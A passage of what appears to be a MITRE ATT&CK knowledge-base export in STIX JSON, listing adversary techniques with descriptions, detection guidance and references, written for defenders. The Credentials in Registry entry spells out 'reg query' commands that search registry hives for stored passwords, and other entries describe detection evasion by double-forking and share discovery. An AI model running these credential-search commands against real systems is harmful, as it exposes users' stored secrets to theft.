out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_system_requirements": ["Access to application deployment software (EPO, HPCA, Altiris, etc.)"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61", "created": "2017-05-31T21:30:27.755Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1017", "external_id": "T1017"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/187.html", "external_id": "CAPEC-187"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-09-22T19:13:52.548Z", "name": "Code Signing", "description": "Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.\n\nCode signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)\n\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Windows User Account Control"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", "created": "2020-02-05T16:27:37.784Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1553/002", "external_id": "T1553.002"}, {"source_name": "EclecticLightChecksonEXECodeSigning", "description": "Howard Oakley. (2020, November 16). Checks on executable code in Catalina and Big Sur: a first draft. Retrieved September 21, 2022.", "url": "https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/"}, {"source_name": "Securelist Digital Certificates", "description": "Ladikov, A. (2015, January 29). Why You Shouldn\u2019t Completely Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.", "url": "https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/"}, {"source_name": "Symantec Digital Certificates", "description": "Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.", "url": "http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates"}, {"source_name": "Wikipedia Code Signing", "description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.", "url": "https://en.wikipedia.org/wiki/Code_signing"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-09-29T16:11:43.530Z", "name": "Data from Cloud Storage", "description": "Adversaries may access data from cloud storage.\n\nMany IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform. \n\nIn some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the [Cloud API](https://attack.mitre.org/techniques/T1059/009). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://attack.mitre.org/techniques/T1213)). \n\nAdversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.\n\nThis open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)\n\nAdversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Netskope", "Praetorian", "AppOmni"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS", "SaaS", "Google Workspace", "Office 365"], "x_mitre_version": "2.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7", "created": "2019-08-30T18:07:27.741Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1530", "external_id": "T1530"}, {"source_name": "Amazon S3 Security, 2019", "description": "Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019.", "url": "https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/"}, {"source_name": "Microsoft Azure Storage Security, 2019", "description": "Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). Azure Storage security guide. Retrieved October 4, 2019.", "url": "https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide"}, {"source_name": "Wired Magecart S3 Buckets, 2019", "description": "Barrett, B.. (2019, July 11). Hack Brief: A Card-Skimming Hacker Group Hit 17K Domains\u2014and Counting. Retrieved October 4, 2019.", "url": "https://www.wired.com/story/magecart-amazon-cloud-hacks/"}, {"source_name": "Google Cloud Storage Best Practices, 2019", "description": "Google. (2019, September 16). Best practices for Cloud Storage. Retrieved October 4, 2019.", "url": "https://cloud.google.com/storage/docs/best-practices"}, {"source_name": "HIPAA Journal S3 Breach, 2017", "description": "HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.", "url": "https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/"}, {"source_name": "Rclone-mega-extortion_05_2021", "description": "Justin Schoenfeld, Aaron Didier. (2021, May 4). Transferring leverage in a ransomware attack. Retrieved July 14, 2022.", "url": "https://redcanary.com/blog/rclone-mega-extortion/"}, {"source_name": "Trend Micro S3 Exposed PII, 2017", "description": "Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.", "url": "https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Runtime Data Manipulation", "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Integrity"], "x_mitre_permissions_required": ["User", "Administrator", "root", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", "created": "2020-03-02T14:30:05.252Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1565/003", "external_id": "T1565.003"}, {"source_name": "FireEye APT38 Oct 2018", "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", "url": "https://content.fireeye.com/apt/rpt-apt38"}, {"source_name": "DOJ Lazarus Sony 2018", "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", "url": "https://www.justice.gov/opa/press-release/file/1092091/download"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:03.187Z", "name": "Data from Information Repositories", "description": "Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases in the process environment, as well as databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018)\n\nInformation collected from these systems may provide the adversary with a better understanding of the operational environment, vendors used, processes, or procedures of the ICS.\n\nIn a campaign between 2011 and 2013 against ONG organizations, Chinese state-sponsored actors searched document repositories for specific information such as, system manuals, remote terminal unit (RTU) sites, personnel lists, documents that included the string SCAD*, user credentials, and remote dial-up access information. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.2", "x_mitre_data_sources": ["Logon Session: Logon Session Creation", "Network Share: Network Share Access", "Application Log: Application Log Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0811", "external_id": "T0811"}, {"source_name": "Cybersecurity & Infrastructure Security Agency March 2018", "description": "Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2019/10/11 ", "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-074A"}, {"source_name": "CISA AA21-201A Pipeline Intrusion July 2021", "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-07-28T18:29:56.525Z", "name": "Credentials in Registry", "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\n\nExample commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)\n\n* Local Machine Hive: reg query HKLM /f password /t REG_SZ /s\n* Current User Hive: reg query HKCU /f password /t REG_SZ /s", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Sudhanshu Chauhan, @Sudhanshu_C"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", "created": "2020-02-04T12:58:40.678Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1552/002", "external_id": "T1552.002"}, {"source_name": "Pentestlab Stored Credentials", "description": "netbiosX. (2017, April 19). Stored Credentials. Retrieved April 6, 2018.", "url": "https://pentestlab.blog/2017/04/19/stored-credentials/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-09-29T19:44:43.870Z", "name": "Network Share Discovery", "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \n\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\\\\\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Praetorian"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows", "Linux"], "x_mitre_version": "3.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1135", "external_id": "T1135"}, {"source_name": "TechNet Shared Folder", "description": "Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30, 2017.", "url": "https://technet.microsoft.com/library/cc770880.aspx"}, {"source_name": "Wikipedia Shared Resource", "description": "Wikipedia. (2017, April 15). Shared resource. Retrieved June 30, 2017.", "url": "https://en.wikipedia.org/wiki/Shared_resource"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Peripheral Device Discovery", "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", "created": "2017-05-31T21:31:28.471Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1120", "external_id": "T1120"}, {"source_name": "Peripheral Discovery Linux", "description": "Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.", "url": "https://linuxhint.com/list-usb-devices-linux/"}, {"source_name": "Peripheral Discovery macOS", "description": "SS64. (n.d.). system_profiler. Retrieved March 11, 2022.", "url": "https://ss64.com/osx/system_profiler.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-03T04:06:42.256Z", "name": "Break Process Trees", "description": "An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the \u201cparent-child\" relationship for detection, breaking this relationship could result in the adversary\u2019s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022) \n\nOn Linux systems, adversaries may execute a series of [Native API](https://attack.mitre.org/techniques/T1106) calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.\n\nAnother example is using the \u201cdaemon\u201d syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Tim (Wadhwa-)Brown"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", "created": "2023-09-27T19:49:40.815Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1036/009", "external_id": "T1036.009"}, {"source_name": "3OHA double-fork 2022", "description": "Juan Tapiador. (2022, April 11). UNIX daemonization and the double fork. Retrieved September 29, 2023.", "url": "https://0xjet.github.io/3OHA/2022/04/11/post.html"}, {"source_name": "Microsoft XorDdos Linux Stealth 2022", "description": "Microsoft Threat Intelligence. (2022, May 19). Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved September 27, 2023.", "url": "https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/"}, {"source_name": "Sandfly BPFDoor 2022", "description": "The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023.", "url": "https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Network Topology", "description": "Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--34ab90a3-05f6-4259-8f21-621081fdaba5", "created": "2020-10-02T15:49:03.815Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1590/004", "external_id": "T1590.004"}, {"source_name": "DNS Dumpster", "description": "Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.", "url": "https://dnsdumpster.com/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Code Signing Certificates", "description": "Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf", "created": "2020-10-01T01:41:08.652Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1587/002", "external_id": "T1587.002"}, {"source_name": "Wikipedia Code Signing", "description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.", "url": "https://en.wikipedia.org/wiki/Code_signing"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Windows File and Directory Permissions Modification", "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nWindows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)\n\nAdversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", "created": "2020-02-04T19:17:41.767Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1222/001", "external_id": "T1222.001"}, {"source_name": "Hybrid Analysis Icacls1 June 2018", "description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.", "url": "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100"}, {"source_name": "Hybrid Analysis Icacls2 May 2018", "description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.", "url": 